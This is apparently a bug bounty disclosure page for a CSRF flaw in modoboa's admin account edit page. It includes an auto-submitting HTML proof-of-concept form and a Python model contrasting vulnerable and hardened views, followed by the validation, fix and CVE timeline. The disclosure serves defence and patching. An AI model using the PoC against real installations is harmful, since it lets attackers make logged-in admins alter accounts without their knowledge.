CSRF leading to edit admin accounts in modoboa/modoboa

Valid

Reported on

Feb 26th 2023


Description

The GET /admin/accounts/{id}/edit/?active_tab=default page is vulnerable to a CSRF attack.

Proof of Concept

Log in as admin, then try editing an admin account (for example, id=4) by opening the following file in the browser.

<!DOCTYPE html>
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://demo.modoboa.org/admin/accounts/4/edit/">
      <input type="hidden" name="active_tab" value="default" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

An attacker could force a logged-in admin to edit and update admin accounts.
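To make the defect and the fix concrete, here is an added model of the edit endpoint that is not modoboa's own code: the pre-fix view accepts any authenticated request, including the plain cross-site GET the PoC sends (the browser attaches the admin's session cookie automatically), while the hardened view requires POST, a per-session synchronizer token (field named after Django's csrfmiddlewaretoken) and a same-origin Origin/Referer header. The Request class, the handler return codes and the attacker referer are constructed for this illustration.

```python
import hmac
import secrets
from dataclasses import dataclass, field

ALLOWED_ORIGIN = "https://demo.modoboa.org"


@dataclass
class Request:
    """Minimal stand-in for a framework request (constructed for this example)."""
    method: str
    path: str
    params: dict
    headers: dict = field(default_factory=dict)
    session: dict = field(default_factory=dict)  # what the cookie resolves to


def new_admin_session():
    # A logged-in admin with a fresh per-session CSRF token.
    return {"user": "admin", "csrf_token": secrets.token_hex(16)}


def vulnerable_edit_view(req):
    """Pre-fix behaviour from the report: being logged in is the only gate,
    so a GET triggered from a foreign page reaches the edit logic."""
    if req.session.get("user") != "admin":
        return 403
    return 200  # state change would happen here


def hardened_edit_view(req):
    """State change only on POST with a valid token and a same-origin source."""
    if req.session.get("user") != "admin":
        return 403
    if req.method != "POST":
        return 405  # GET must be side-effect free
    token = req.params.get("csrfmiddlewaretoken", "")
    expected = req.session.get("csrf_token", "")
    if not token or not hmac.compare_digest(token, expected):
        return 403  # missing/forged token: constant-time compare
    source = req.headers.get("Origin") or req.headers.get("Referer", "")
    if not source.startswith(ALLOWED_ORIGIN + "/") and source != ALLOWED_ORIGIN:
        return 403  # cross-site source
    return 200


def poc_request(session):
    # The report's Burp-style PoC: a cross-site GET carrying only active_tab.
    return Request("GET", "/admin/accounts/4/edit/", {"active_tab": "default"},
                   headers={"Referer": "https://attacker-site.invalid/"}, session=session)


def legitimate_request(session):
    # A form submission from modoboa's own edit page.
    return Request("POST", "/admin/accounts/4/edit/",
                   {"active_tab": "default", "csrfmiddlewaretoken": session["csrf_token"]},
                   headers={"Origin": ALLOWED_ORIGIN}, session=session)
```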

We are processing your report and will contact the modoboa team within 24 hours. 3 months ago
Antoine Nguyen validated this vulnerability 3 months ago
memmedrehimzade has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
memmedrehimzade (Researcher), 3 months ago:

Can you assign a CVE please?

memmedrehimzade (Researcher), 3 months ago:

any update?

memmedrehimzade (Researcher), 2 months ago:

@admin

Ben Harvie (Admin), a month ago:

The maintainer has the power to assign a CVE during the fix and publish stages.

Antoine Nguyen marked this as fixed in 2.1.0 with commit 5d886f a month ago
Antoine Nguyen has been awarded the fix bounty
This vulnerability has been assigned a CVE
Antoine Nguyen published this vulnerability a month ago